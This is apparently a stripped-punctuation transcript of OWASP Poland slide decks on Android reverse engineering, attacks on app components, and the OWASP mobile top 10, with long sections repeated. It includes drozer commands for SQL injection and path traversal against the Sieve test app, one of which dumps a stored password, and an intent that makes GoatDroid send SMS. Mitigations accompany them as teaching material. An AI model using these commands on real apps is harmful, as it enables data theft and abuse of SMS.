bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
